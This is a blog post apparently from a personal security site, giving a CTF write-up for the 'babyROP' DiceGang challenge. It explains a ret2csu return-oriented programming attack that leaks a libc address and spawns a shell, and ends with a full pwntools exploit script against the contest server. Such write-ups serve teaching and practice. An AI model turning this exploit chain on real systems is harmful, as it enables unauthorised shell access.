<!DOCTYPE html>
<html lang="en">
<head>
<meta http-equiv="Content-Type" content="text/html; charset=UTF-8">
  <meta charset="utf-8">
  <meta http-equiv="X-UA-Compatible" content="IE=edge">
  <meta name="viewport" content="width=device-width, initial-scale=1">
  <meta name="google-translate-customization" content="108d9124921d80c3-80e20d618ff053c8-g4f02ec6f3dba68b7-c">
<!-- Begin Jekyll SEO tag v2.8.0 -->
<title>babyROP DiceGang CTF | TourPran Blogs</title>
<meta name="generator" content="Jekyll v4.3.3">
<meta property="og:title" content="babyROP DiceGang CTF">
<meta name="author" content="tourpran">
<meta property="og:locale" content="en_US">
<meta name="description" content="Challenge Description">
<meta property="og:description" content="Challenge Description">
<link rel="canonical" href="http://localhost:4000/writeup/2021/02/07/babyropdice.html">
<meta property="og:url" content="http://localhost:4000/writeup/2021/02/07/babyropdice.html">
<meta property="og:site_name" content="TourPran Blogs">
<meta property="og:type" content="article">
<meta property="article:published_time" content="2021-02-07T00:00:00+05:30">
<meta name="twitter:card" content="summary">
<meta property="twitter:title" content="babyROP DiceGang CTF">
<script type="application/ld+json">
{"@context":"https://schema.org","@type":"BlogPosting","author":{"@type":"Person","name":"tourpran"},"dateModified":"2021-02-07T00:00:00+05:30","datePublished":"2021-02-07T00:00:00+05:30","description":"Challenge Description","headline":"babyROP DiceGang CTF","mainEntityOfPage":{"@type":"WebPage","@id":"http://localhost:4000/writeup/2021/02/07/babyropdice.html"},"url":"http://localhost:4000/writeup/2021/02/07/babyropdice.html"}</script>
<!-- End Jekyll SEO tag -->
<link rel="shortcut icon" href="">
  <link rel="stylesheet" href="https://cdnjs.cloudflare.com/ajax/libs/font-awesome/4.7.0/css/font-awesome.min.css">
  <link rel="stylesheet" href="https://cdn.jsdelivr.net/npm/typeface-noto-sans@0.0.72/index.min.css">
  <link rel="stylesheet" href="//cdnjs.cloudflare.com/ajax/libs/highlight.js/10.1.1/styles/default.min.css">
  <script src="//cdnjs.cloudflare.com/ajax/libs/highlight.js/10.1.1/highlight.min.js"></script>
  <!-- and it's easy to individually load additional languages -->
  <script charset="UTF-8" src="https://cdnjs.cloudflare.com/ajax/libs/highlight.js/10.1.1/languages/go.min.js"></script>
  <link rel="stylesheet" href="/assets/css/main.css">
  <script src="/assets/js/main.js"></script><link type="application/atom+xml" rel="alternate" href="http://localhost:4000/feed.xml" title="TourPran Blogs">
</head>
<body>



















<header class="site-header " role="banner">

  <div class="wrapper">
    <div class="site-header-inner">
<span class="site-brand"><a class="site-brand-inner" rel="author" href="/">
  <img class="site-favicon" title="TourPran Blogs" src="" onerror="this.style.display='none'">
  TourPran Blogs
</a>
</span><nav class="site-nav">
          <input type="checkbox" id="nav-trigger" class="nav-trigger">
          <label for="nav-trigger">
            <span class="menu-icon">
              <svg viewbox="0 0 18 15" width="18px" height="15px">
                <path d="M18,1.484c0,0.82-0.665,1.484-1.484,1.484H1.484C0.665,2.969,0,2.304,0,1.484l0,0C0,0.665,0.665,0,1.484,0 h15.032C17.335,0,18,0.665,18,1.484L18,1.484z M18,7.516C18,8.335,17.335,9,16.516,9H1.484C0.665,9,0,8.335,0,7.516l0,0 c0-0.82,0.665-1.484,1.484-1.484h15.032C17.335,6.031,18,6.696,18,7.516L18,7.516z M18,13.516C18,14.335,17.335,15,16.516,15H1.484 C0.665,15,0,14.335,0,13.516l0,0c0-0.82,0.665-1.483,1.484-1.483h15.032C17.335,12.031,18,12.695,18,13.516L18,13.516z"></path>
              </svg>
            </span>
          </label>

          <div class="trigger">
<a class="page-link" href="/">HOME</a><a class="page-link" href="/pwntrain.html">PWN TRAINING</a><a class="page-link" href="/categories.html">CATEGORIES</a><a class="page-link" href="/portfolio.html">PORTFOLIO</a>




</div>
        </nav>
</div>
  </div>
</header>

<script>
  (function() {
    var lastScrollY = getScrollPos().y;
    var documentElement = document.documentElement;

    function storeScrollData() {
      var y = getScrollPos().y;var scrollStatus = "";

      if (y <= 0) {
        scrollStatus = "top";
      } else if ((window.innerHeight + y) >= document.body.offsetHeight) {
        scrollStatus = "bottom";
      } else {
        var isScrollDown = (y - lastScrollY > 0) ? true : false;
        scrollStatus = isScrollDown ? "down" : "up";
      }

      lastScrollY = y;
      documentElement.setAttribute("data-scroll-status", scrollStatus);
    }

    window.addEventListener('scroll', function(e) {
      storeScrollData();
    });

    storeScrollData();
  })();
</script>










































<script>
  function hashLocate(hashValue) {
    hashValue = hashValue.replace(/^.*#h-/, '');
    var element = document.getElementById(hashValue);

    if (!element) {
      return;
    }

    var header = document.querySelector('header.site-header');
    var headerRect = header.getBoundingClientRect();
    var headerTop = Math.floor(headerRect.top);
    var headerHeight = Math.floor(headerRect.height);
    var scrollPos = getScrollPos();
    var offsetY = element.offsetTop - (headerTop + headerHeight + 20);

    if (offsetY == scrollPos.y) {
      return;
    }

    if (headerTop == 0  && offsetY > scrollPos.y) {
      offsetY += headerHeight + 2;
    } else if (headerTop < 0  && offsetY < scrollPos.y) {
      offsetY -= headerHeight - 2;
    }

    smoothScrollTo(offsetY);
  }

  // The first event occurred
  window.addEventListener('load', function(event) {
    if (window.location.hash) {
      hashLocate(window.location.hash);
    }
  });

  // The first event occurred
  window.addEventListener('click', function(event) {
    if (event.target.matches('a')) {
      hashLocate(event.target.getAttribute('href'));
    }
  });
</script>
<main class="page-content" aria-label="Content">
      <div class="wrapper">
        <div class="framework">
  <section class="main">

     <div class="post">
  <section>









<header class="post-header">
  <h1 class="post-title p-name" itemprop="name headline">babyROP | DiceGang CTF</h1>
  <h3 class="post-subtitle"></h3>

  <p class="post-meta">
    <time class="dt-published" datetime="2021-02-07T00:00:00+05:30" itemprop="datePublished"><i class="fa fa-calendar"></i> 07 Feb 2021
    </time>

    





















    <span class="post-reading-time left-vsplit"><i class="fa fa-clock-o"></i> About 6 mins</span>
  </p>
<div class="post-tags">
<a class="post-tag" href="/tags.html#csu">#csu</a><a class="post-tag" href="/tags.html#ret2csu">#ret2csu</a><a class="post-tag" href="/tags.html#dicegang">#dicegang</a>
</div></header>
<article class="post h-entry" itemscope itemtype="http://schema.org/BlogPosting">

    <div class="post-content e-content" itemprop="articleBody">

      <h2 id="challenge-description">Challenge Description</h2>
<p><img src="/assets/images/challdesbabyrop.png" alt=""></p>

<h3 id="solution">Solution:</h3>

<ul>
  <li>Checkout the mitigations of the binary</li>
  <li>Try to find gadgets since this is a ROP challenge. If you dont know much about ROP checkout <a href="https://ropemporium.com/">ROPemporium</a>.</li>
  <li>Craft the payload to get flag from server.</li>
</ul>

<h4 id="mitigations">Mitigations:</h4>
<p><img src="/assets/images/mitigationdice.png" alt=""></p>
<ul>
  <li>We can’t excecute shellcode (NX Enabled)</li>
  <li>No Canary found - no need for brute force or leaks</li>
  <li>PIE disabled - the address of the binary wont be randomised</li>
</ul>

<h4 id="finding-gadgets">Finding Gadgets:</h4>

<p>Install ROPgadget to find all the gadgets in the binary.</p>
<div class="language-bash highlighter-rouge"><div class="highlight"><pre class="highlight"><code>ROPgadget <span class="nt">--binary</span> babyrop
</code></pre></div></div>
<p>My first thought was to <code class="language-plaintext highlighter-rouge">write</code> the address pointed by the got of <code class="language-plaintext highlighter-rouge">write</code>. The idea was to leak the address of write function. Since write has already been called by the program the GOT of write will be populated and the got will point to the libc address of write. The following gadgets are needed.</p>
<pre><code class="language-asm">pop rdi
pop rsi 
pop rdx
</code></pre>
<p>I did not have the pop rdx register which makes the challenge a bit more intresting. So we need to find a way to set the value of RDX, RSI, RDI.</p>
<pre><code class="language-asm">rsi - point to the buffer [write@got]
rdi - file discriptor = 1
rdx - size of the buffer = &gt;8
</code></pre>

<p>Since ropgadget did not give me the gadget I went to look for more gadgets in the <code class="language-plaintext highlighter-rouge">__libc_csu_init</code>. There I could find all the gadgets I wanted.</p>

<h4 id="crafting-exploit">Crafting Exploit:</h4>

<p>These are the important gadgets I want.</p>

<p><img src="/assets/images/gadgetsdice.png" alt=""></p>

<h4 id="idea">Idea</h4>

<p>First overflow the buffer with garbage and then make return jump to csu. Things to note.</p>

<pre><code class="language-asm">0x00000000004011b0 &lt;+64&gt;:	mov    rdx,r14
0x00000000004011b3 &lt;+67&gt;:	mov    rsi,r13
0x00000000004011b6 &lt;+70&gt;:	mov    edi,r12d

0x00000000004011ca &lt;+90&gt;:	pop    rbx
0x00000000004011cb &lt;+91&gt;:	pop    rbp
0x00000000004011cc &lt;+92&gt;:	pop    r12
0x00000000004011ce &lt;+94&gt;:	pop    r13
0x00000000004011d0 &lt;+96&gt;:	pop    r14
0x00000000004011d2 &lt;+98&gt;:	pop    r15
0x00000000004011d4 &lt;+100&gt;:	ret 
</code></pre>

<p>Now we can control the RDI, RSI, RDX because we can control the r14, r13, r12 registers. Intresting area was the call to <code class="language-plaintext highlighter-rouge">QWORD PTR [r15+rbx*8]</code> inbetween these gadgets. So we decided to make this <code class="language-plaintext highlighter-rouge">QWORD PTR [r15+rbx*8]</code> as the write function. In order to do this well set r15 as the address to write@got and rbx as 0.</p>

<pre><code class="language-asm">0x00000000004011b9 &lt;+73&gt;:	call   QWORD PTR [r15+rbx*8]
0x00000000004011bd &lt;+77&gt;:	add    rbx,0x1
0x00000000004011c1 &lt;+81&gt;:	cmp    rbp,rbx
0x00000000004011c4 &lt;+84&gt;:	jne    0x4011b0 &lt;__libc_csu_init+64&gt;
</code></pre>
<p>Hmmm :(. Seems like there is a compare statement that’ll make us jump back to the csu+64 (which is somewhere in the middle of csu). Now lets make rbp as 1 so we dont take the jump.</p>

<div class="language-python highlighter-rouge"><div class="highlight"><pre class="highlight"><code><span class="n">buf</span> <span class="o">=</span> <span class="sa">b</span><span class="sh">"</span><span class="s">a</span><span class="sh">"</span><span class="o">*</span><span class="mi">72</span>
<span class="n">buf</span> <span class="o">+=</span> <span class="nf">p64</span><span class="p">(</span><span class="mh">0x00000000004011ca</span><span class="p">)</span> <span class="c1">#rbx rbp r12 r13 r14 r15
</span><span class="n">buf</span> <span class="o">+=</span> <span class="nf">p64</span><span class="p">(</span><span class="mi">0</span><span class="p">)</span><span class="o">+</span><span class="nf">p64</span><span class="p">(</span><span class="mi">1</span><span class="p">)</span><span class="o">+</span><span class="nf">p64</span><span class="p">(</span><span class="mi">1</span><span class="p">)</span><span class="o">+</span><span class="nf">p64</span><span class="p">(</span><span class="n">elf</span><span class="p">.</span><span class="n">got</span><span class="p">[</span><span class="sh">'</span><span class="s">write</span><span class="sh">'</span><span class="p">])</span><span class="o">+</span><span class="nf">p64</span><span class="p">(</span><span class="mi">8</span><span class="p">)</span><span class="o">+</span><span class="nf">p64</span><span class="p">(</span><span class="n">elf</span><span class="p">.</span><span class="n">got</span><span class="p">[</span><span class="sh">'</span><span class="s">write</span><span class="sh">'</span><span class="p">])</span>
<span class="n">buf</span> <span class="o">+=</span> <span class="nf">p64</span><span class="p">(</span><span class="mh">0x00000000004011b0</span><span class="p">)</span>
<span class="n">buf</span> <span class="o">+=</span> <span class="nf">p64</span><span class="p">(</span><span class="mi">0</span><span class="p">)</span><span class="o">*</span><span class="mi">7</span>
<span class="n">buf</span> <span class="o">+=</span> <span class="nf">p64</span><span class="p">(</span><span class="n">elf</span><span class="p">.</span><span class="n">sym</span><span class="p">[</span><span class="sh">'</span><span class="s">main</span><span class="sh">'</span><span class="p">])</span>
</code></pre></div></div>

<p>Exploit for leaking libc write address looks something like this. :) Now lets just recv the leak and see what libc they are using. To find out their libc go to <a href="https://libc.blukat.me/">libc.blukat.me</a></p>

<p><img src="/assets/images/blukatdice.png" alt=""></p>

<p>Now its basic math, since all the address in the libc will be at the same offset from one another. Once you get the leak just find address of /bin/sh and system then just call system with /bin/sh as argument. Pretty intresting challenge and fun to solve :).</p>

<p>Anyway here is the exploit script for this challenge.</p>

<div class="language-python highlighter-rouge"><div class="highlight"><pre class="highlight"><code><span class="c1">#!/usr/bin/env python3
</span><span class="kn">from</span> <span class="n">pwn</span> <span class="kn">import</span> <span class="o">*</span>

<span class="c1"># Set up pwntools for the correct architecture
</span><span class="n">context</span><span class="p">.</span><span class="nf">update</span><span class="p">(</span><span class="n">arch</span><span class="o">=</span><span class="sh">'</span><span class="s">i386</span><span class="sh">'</span><span class="p">)</span>
<span class="n">exe</span> <span class="o">=</span> <span class="sh">'</span><span class="s">./babyrop</span><span class="sh">'</span>

<span class="n">elf</span> <span class="o">=</span> <span class="nc">ELF</span><span class="p">(</span><span class="sh">"</span><span class="s">./babyrop</span><span class="sh">"</span><span class="p">)</span>

<span class="k">def</span> <span class="nf">start</span><span class="p">(</span><span class="n">argv</span><span class="o">=</span><span class="p">[],</span> <span class="o">*</span><span class="n">a</span><span class="p">,</span> <span class="o">**</span><span class="n">kw</span><span class="p">):</span>
    <span class="k">if</span> <span class="n">args</span><span class="p">.</span><span class="n">GDB</span><span class="p">:</span>
        <span class="k">return</span> <span class="n">gdb</span><span class="p">.</span><span class="nf">debug</span><span class="p">([</span><span class="n">exe</span><span class="p">]</span> <span class="o">+</span> <span class="n">argv</span><span class="p">,</span> <span class="n">gdbscript</span><span class="o">=</span><span class="n">gdbscript</span><span class="p">,</span> <span class="o">*</span><span class="n">a</span><span class="p">,</span> <span class="o">**</span><span class="n">kw</span><span class="p">)</span>
    <span class="k">else</span><span class="p">:</span>
        <span class="k">return</span> <span class="nf">process</span><span class="p">([</span><span class="n">exe</span><span class="p">]</span> <span class="o">+</span> <span class="n">argv</span><span class="p">,</span> <span class="o">*</span><span class="n">a</span><span class="p">,</span> <span class="o">**</span><span class="n">kw</span><span class="p">)</span>

<span class="c1"># ./exploit.py GDB
</span><span class="n">gdbscript</span> <span class="o">=</span> <span class="sh">'''</span><span class="s">
continue
</span><span class="sh">'''</span><span class="p">.</span><span class="nf">format</span><span class="p">(</span><span class="o">**</span><span class="nf">locals</span><span class="p">())</span>

<span class="c1">#===========================================================
#                    EXPLOIT GOES HERE
#===========================================================
</span>
<span class="n">p</span> <span class="o">=</span> <span class="nf">remote</span><span class="p">(</span><span class="sh">"</span><span class="s">dicec.tf</span><span class="sh">"</span><span class="p">,</span> <span class="mi">31924</span><span class="p">)</span>

<span class="c1"># shellcode = asm(shellcraft.sh())
</span>
<span class="sh">'''</span><span class="s">
0x00000000004011d3 : pop rdi ; ret

write syscall 
rdi = 1
rsi = pointer to puffer (pointer to write function)
rdx = size
</span><span class="sh">'''</span>

<span class="n">p</span><span class="p">.</span><span class="nf">recvuntil</span><span class="p">(</span><span class="sh">"</span><span class="s">: </span><span class="sh">"</span><span class="p">)</span>

<span class="n">buf</span> <span class="o">=</span> <span class="sa">b</span><span class="sh">"</span><span class="s">a</span><span class="sh">"</span><span class="o">*</span><span class="mi">72</span>
<span class="n">buf</span> <span class="o">+=</span> <span class="nf">p64</span><span class="p">(</span><span class="mh">0x00000000004011ca</span><span class="p">)</span> <span class="c1">#rbx rbp r12 r13 r14 r15
</span><span class="n">buf</span> <span class="o">+=</span> <span class="nf">p64</span><span class="p">(</span><span class="mi">0</span><span class="p">)</span><span class="o">+</span><span class="nf">p64</span><span class="p">(</span><span class="mi">1</span><span class="p">)</span><span class="o">+</span><span class="nf">p64</span><span class="p">(</span><span class="mi">1</span><span class="p">)</span><span class="o">+</span><span class="nf">p64</span><span class="p">(</span><span class="n">elf</span><span class="p">.</span><span class="n">got</span><span class="p">[</span><span class="sh">'</span><span class="s">write</span><span class="sh">'</span><span class="p">])</span><span class="o">+</span><span class="nf">p64</span><span class="p">(</span><span class="mi">8</span><span class="p">)</span><span class="o">+</span><span class="nf">p64</span><span class="p">(</span><span class="n">elf</span><span class="p">.</span><span class="n">got</span><span class="p">[</span><span class="sh">'</span><span class="s">write</span><span class="sh">'</span><span class="p">])</span>
<span class="n">buf</span> <span class="o">+=</span> <span class="nf">p64</span><span class="p">(</span><span class="mh">0x00000000004011b0</span><span class="p">)</span> 
<span class="n">buf</span> <span class="o">+=</span> <span class="nf">p64</span><span class="p">(</span><span class="mi">0</span><span class="p">)</span><span class="o">*</span><span class="mi">7</span>
<span class="n">buf</span> <span class="o">+=</span> <span class="nf">p64</span><span class="p">(</span><span class="n">elf</span><span class="p">.</span><span class="n">sym</span><span class="p">[</span><span class="sh">'</span><span class="s">main</span><span class="sh">'</span><span class="p">])</span>
<span class="n">p</span><span class="p">.</span><span class="nf">sendline</span><span class="p">(</span><span class="n">buf</span><span class="p">)</span>

<span class="c1"># log.info("write leak: {}".format((hex(u64(p.recv(8))))))
</span>
<span class="n">leak</span> <span class="o">=</span> <span class="nf">int</span><span class="p">(</span><span class="nf">hex</span><span class="p">(</span><span class="nf">u64</span><span class="p">(</span><span class="n">p</span><span class="p">.</span><span class="nf">recv</span><span class="p">(</span><span class="mi">8</span><span class="p">))),</span> <span class="mi">16</span><span class="p">)</span>
<span class="n">log</span><span class="p">.</span><span class="nf">info</span><span class="p">(</span><span class="sh">"</span><span class="s">Write leak: {}</span><span class="sh">"</span><span class="p">.</span><span class="nf">format</span><span class="p">(</span><span class="nf">hex</span><span class="p">(</span><span class="n">leak</span><span class="p">)))</span>

<span class="n">sys</span> <span class="o">=</span> <span class="n">leak</span><span class="o">-</span><span class="mh">0xbbdc0</span>

<span class="n">binsh</span> <span class="o">=</span> <span class="n">leak</span><span class="o">+</span><span class="mh">0xa63da</span>

<span class="n">buf</span> <span class="o">=</span> <span class="sa">b</span><span class="sh">"</span><span class="s">a</span><span class="sh">"</span><span class="o">*</span><span class="mi">72</span>
<span class="n">buf</span> <span class="o">+=</span> <span class="nf">p64</span><span class="p">(</span><span class="mh">0x40116b</span><span class="p">)</span> <span class="c1">#ret
</span><span class="n">buf</span> <span class="o">+=</span> <span class="nf">p64</span><span class="p">(</span><span class="mh">0x00000000004011d3</span><span class="p">)</span> <span class="c1">#pop rdi 
</span><span class="n">buf</span> <span class="o">+=</span> <span class="nf">p64</span><span class="p">(</span><span class="n">binsh</span><span class="p">)</span>
<span class="n">buf</span> <span class="o">+=</span> <span class="nf">p64</span><span class="p">(</span><span class="n">sys</span><span class="p">)</span>

<span class="n">p</span><span class="p">.</span><span class="nf">sendline</span><span class="p">(</span><span class="n">buf</span><span class="p">)</span>

<span class="n">p</span><span class="p">.</span><span class="nf">interactive</span><span class="p">()</span>


</code></pre></div></div>


    </div>

</article>
<div class="post-nav">
<a class="previous" href="/blogs/2020/09/13/got-plt.html" title="[part 3] Global Offset Table and Procedure Linkage Table">[part 3] Global Offset Table and...</a><a class="next" href="/blogs/2021/03/27/sqlinjection.html" title="[side quest] SQL Injection">[side quest] SQL Injection</a>
</div>
<div class="post-related">
      <div>Related Articles</div>
      <ul>
        <li><a class="post-link" href="/pwn-training/2021/05/09/simple-ret2shellcode-training1.html" title="[side quest] SQL Injection">[pwn 1] Return to Shellcode</a></li>
<li><a class="post-link" href="/writeup/2021/02/07/babyropdice.html" title="[side quest] SQL Injection">babyROP | DiceGang CTF</a></li>
<li><a class="post-link" href="/pwn-training/2021/05/24/return2libcpwntrain.html" title="[side quest] SQL Injection">[pwn 3] Return to libc</a></li>
<li><a class="post-link" href="/blogs/2019/09/29/myfirstctf.html" title="[side quest] SQL Injection">[Random] My First CTF</a></li>
</ul>
    </div>
<div class="post-comments"></div></section>
</div>


  </section>
  <section class="sidebar" style="margin-left: 15px;">
    <!-- Get sidebar items --><style type="text/css" media="screen">
.post-menu ul {
  list-style: none;
  padding: 0;
  margin: 0;
}
</style>

<div class="post-menu">
  <div class="post-menu-title">TOC</div>
  <div class="post-menu-content"></div>
</div>

<script>
  function generateContent() {
    var menu = document.querySelector(".post-menu");
    var menuContent =  menu.querySelector(".post-menu-content");
    var headings = document.querySelector(".post-content").querySelectorAll("h2, h3, h4, h5, h6");

    // Hide menu when no headings
    if (headings.length === 0) {
      return menu.style.display = "none";
    }

    // Generate post menu
    var menuHTML = '';
    for (var i = 0; i < headings.length; i++) {
      var h = headings[i];
      menuHTML += (
        '<li class="h-' + h.tagName.toLowerCase() + '">'
        + '<a href="#h-' + h.getAttribute('id') + '">' + h.textContent + '</a></li>');
    }

    menuContent.innerHTML = '<ul>' + menuHTML + '</ul>';

    // The header element
    var header = document.querySelector('header.site-header');

    function doMenuCollapse(index, over_items=20) {
      var items = menuContent.firstChild.children;

      if (items.length < over_items) {
        return;
      }

      var activeItem = items[index];
      var beginItem = activeItem
      var endItem = activeItem
      var beginIndex = index;
      var endIndex = index + 1;
      while (beginIndex >= 0
        && !items[beginIndex].classList.contains('h-h2')) {
        beginIndex -= 1;
      }
      while (endIndex < items.length
        && !items[endIndex].classList.contains('h-h2')) {
        endIndex += 1;
      }
      for (var i = 0; i < beginIndex; i++) {
        item = items[i]
        if (!item.classList.contains('h-h2')) {
          item.style.display = 'none';
        }
      }
      for (var i = beginIndex + 1; i < endIndex; i++) {
        item = items[i]
        // if (!item.classList.contains('h-h2')) {
          item.style.display = '';
        // }
      }
      for (var i = endIndex; i < items.length; i++) {
        item = items[i]
        if (!item.classList.contains('h-h2')) {
          item.style.display = 'none';
        }
      }
    }

    // Init menu collapsed
    doMenuCollapse(-1);

    // Active the menu item
    window.addEventListener('scroll', function (event) {
      var lastActive = menuContent.querySelector('.active');
      var changed = true;
      var activeIndex = -1;
      for (var i = headings.length - 1; i >= 0; i--) {
        var h = headings[i];
        var headingRect = h.getBoundingClientRect();
        var headerRect = header.getBoundingClientRect();
        var headerTop = Math.floor(headerRect.top);
        var headerHeight = Math.floor(headerRect.height);
        var headerHeight = headerTop + headerHeight + 20;
        if (headingRect.top <= headerHeight) {
          var id = 'h-' + h.getAttribute('id');
          var a = menuContent.querySelector('a[href="#' + id  + '"]');
          var curActive = a.parentNode;
          if (curActive) {
            curActive.classList.add('active');
            activeIndex = i;
          }
          if (lastActive == curActive) {
            changed = false;
          }
          break;
        }
      }
      if (changed) {
        if (lastActive) {
          lastActive.classList.remove('active');
        }
        doMenuCollapse(activeIndex);
      }
      event.preventDefault();
    });
  }
  generateContent();
</script>
</section>
</div>

      </div>
    </main><footer class="site-footer h-card">
  <data class="u-url" href="/"></data>

</footer>
</body>
</html>
